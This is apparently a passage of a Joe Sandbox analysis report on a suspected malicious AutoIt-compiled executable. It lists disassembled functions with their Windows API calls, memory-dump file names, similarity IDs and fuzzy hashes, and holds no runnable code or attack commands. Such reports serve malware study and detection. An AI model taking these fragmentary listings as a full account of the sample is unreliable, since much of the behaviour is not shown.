                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                                                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                            • API String ID: 2441338619-1568723262
                                                                                                                                                                                                                                                            • Opcode ID: a46fed99ca1c591750973a19942bece662beca9cb15456ddb68e2b8b4ae60672
                                                                                                                                                                                                                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a46fed99ca1c591750973a19942bece662beca9cb15456ddb68e2b8b4ae60672
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                                                                                                                            Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                            • String ID: @COM_EVENTOBJ
                                                                                                                                                                                                                                                            • API String ID: 327565842-2228938565
                                                                                                                                                                                                                                                            • Opcode ID: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
                                                                                                                                                                                                                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                                                                                                                            Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                                                                                                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                                                                                                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                                                                                                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                            • API String ID: 3613100350-2852464175
                                                                                                                                                                                                                                                            • Opcode ID: 77791cc16faf9c3c2fa956c638d556c8bee090e105b4cb7d5d4efc02fa073a56
                                                                                                                                                                                                                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77791cc16faf9c3c2fa956c638d556c8bee090e105b4cb7d5d4efc02fa073a56
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                                                                                                                            Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                            • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                            • Opcode ID: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
                                                                                                                                                                                                                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                                                                                                            Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                                                                                                            Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                                                                                                                            • String ID: crts
                                                                                                                                                                                                                                                            • API String ID: 586820018-3724388283
                                                                                                                                                                                                                                                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                                                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                                                                                                                            Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                            • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                                                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                                                                                                                            Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                                                                                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                                                                                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                            • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                            • Opcode ID: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
                                                                                                                                                                                                                                                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                                                                                                                            Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                            • Opcode ID: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
                                                                                                                                                                                                                                                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                                                                                                                                            Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00417981
                                                                                                                                                                                                                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                                                                                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                                                                                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 004179A2
                                                                                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
